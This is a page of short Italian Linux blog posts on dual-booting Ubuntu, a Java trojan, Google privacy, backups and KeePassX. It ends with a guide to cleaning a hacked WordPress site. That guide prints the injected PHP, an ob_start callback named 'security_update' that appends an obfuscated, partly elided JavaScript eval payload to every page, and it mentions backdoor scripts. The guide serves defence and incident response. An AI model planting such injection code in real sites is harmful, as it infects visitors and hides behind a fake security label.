Voglia di Linux

Ogni mezz’anno sui forum *ubuntu arrivano utenti che si lamentano che sulla versione precedente funzionava benissimo [microfono integrato|wireless|sospensione|webcam|audio|*] e adesso non va più.

Capisco che c’è chi viene attirato irresistibilmente dal nuovo e non resiste e preme il bottone “aggiorna versione”.

Visto che non c’è il bottone “ritorna al sistema precedente” ecco come fare e come ho fatto ai tempi di utilizzo di kubuntu:

Partizionamento con 4 partizioni per Gnu/linux con windows:

sda1 ntfs win
sda2 ntfs dati windows condivisi ntfs
sda3 ext4 12 gb per sistema ubuntu versione 1
[sda4 estesa che contiene le logiche sequenti]
sda5 ext4 12 gb per sistema ubuntu versione 2
sda6 ext4 dati/impostazioni utenti ubuntu montato come /home su entrambi sistemi
sda7 swap per entrambi

Etichettare le partizioni per evitare confusione:

sudo e2label /dev/sdaX nome_etichetta

Durante l’installazione va scelto il partizionamento manuale/esperto, assegnare mount point /home senza formattazione alla partizione che contiene la home dei vari utenti, assegnare mount point / alla partizione del sistema.

Facendo così si hanno i due sistemi in parallelo e si può testare il funzionamento della nuova versione senza rinunciare al sistema vecchio.

Ecco il trojan che sfrutta java per attaccare tutti i sistemi operativi Jnanabot, un trojan scoperto di ottobre che ama diffondersi tramite facebook, che però su linux non sovravive un riavvio…

They show that about 16 per cent of infections hit Macs. They didn’t show any infections on Linux machines. Turner said that Jnanabot attacks on the open source platform weren’t able to survive a reboot.

Come magari qualcuno sa già: Google sa un po’ troppo di noi, delle nostre abitudini e gusti. Ogni ricerca che facciamo, i risultati che clicchiamo, se usiamo gmail tutta la posta e molto altro ancora, anche se non abbiamo nessun account Google aperto nle browser, per esempio tramite google analytics o adsense.

Per utenti firefox c’è una soluzione elegante per anonimizzarci almeno un po’: GoogleSharing, un servizio che mescola tramite server proxy le richieste a google e rende impossibile associarle ad un singolo utente. Ecco l’estensione per firefox.

Sul sito anche le istruzioni come installare il proxy per dare una mano al progetto.

Anche se penso che il backup conviene di farlo in manuale, sapendo cosa fa e come lo fa e andrebbe conosciuto il filesystem Gnu/Linux che non è complicato: Per chi vuole una GUI ecco Backintime.

Praticamente fa lo stesso come rsnasphot.

Guide qui, qui, qui.

Visto che forse non è la cosa migliore fa salvare le passwd a Firefox ma un Password Manager ci vuole : Ho scoperto KeePassX.

Facile installazione con

qmake
make
sudo make install

mentre per Ubuntu e altre distro ci sono pacchetti pronti. Un vantaggio: è disponibile per tutti sistemi operativi, da Linux a Mac a Windows, quindi puoi usare lo stesso file datase.

Facile anche la configurazione, basta creare un file di database (mettendo un punto davanti al nome è nascosto) e scegliere un passwd. La cosa migliore è l’opzione autofill ovvero: Basta aprire nel browser preferito la pagina dove si vuole usare il passwd manager, creare la voce per la coppia nome_utente:passwd, cliccare su Tools > select target window e del pop-up basta selezionare la finestra del Browser. In Utilità >Impostazioni > avanzate spuntare la casella “utilizza i titoli della voce…” e scegliere una scorciatoia, tipo Alt+e.

Dopo basta premere alt+e alla pagina di login, KeePassX compila i campi e preme pure invio. Questo per ora funziona solo su Linux.

All’ apertura del sito appare:

Attenzione: l’apertura di questo sito potrebbe danneggiare il tuo computer!

e nei risultati d ricerca:

www.sito.com
Questo sito potrebbe arrecare danni al tuo computer.

L’infezione aggiungeva uno script in fondo a tutte la pagine. In index.php e altri file si trovava il codice che conteneva:

<?php ob_start('security_update'); function security_update($buffer){return $buffer.'<script language="javascript">function t(){return z($a);}var $a="Z73tZ3dZ22Z2573tZ253dZ2522Z2524Z2561Z253dstZ253bdZ2563Z2573Z2528Z2564Z2561+
Z2564Z2562Z252bdZ2563+Z2564Z2564+Z2564eZ252cZ2531Z2530Z2529;Z2564Z ecc ecc
=0;eval(t());';}//important security update ?>

Se sono compromesse installazioni wordpress (nel mio caso):

• Segnarsi la data di modifica di index.php e/o altri file infetti
• cambiare passwd FTP e assicurarsi che sul proprio PC non siano presenti trojan che leggano il passwd di client come filezilla. Magari usare un cd live di ubuntu per pulire il sito, nel dubbio
• reinstallare wordpress, joomla ecc, e nel caso che i file di wordpress si trovano in un altra directory del sito sostituire il file index.php, che nel caso che sia infetto pesa 6.5kb invece di 104b.
• Controllare la data di modifica degli script in /cgi-bin e sostituirli con i backup nel caso che siano infetti. Nel caso mio erano infetti anche counter.cgi che viene chiamato da molte pagine.Controllare anche eventuali file *.htm che sono modificati, nel caso mio c'erano 3 o 4 infetti con uno javascript.
• Controllare se è presente un script tipo "chat.pl", nel caso mio era un backdoor per accedere al server senza passwd e eliminarlo
• Controllare se nella root sia presente mailcheck.php e eliminarlo.

Pubblicati da A fino B che fa pensare che ci sono anche di più.

Ecco la notizia. Sembrano anche affetti account gmail.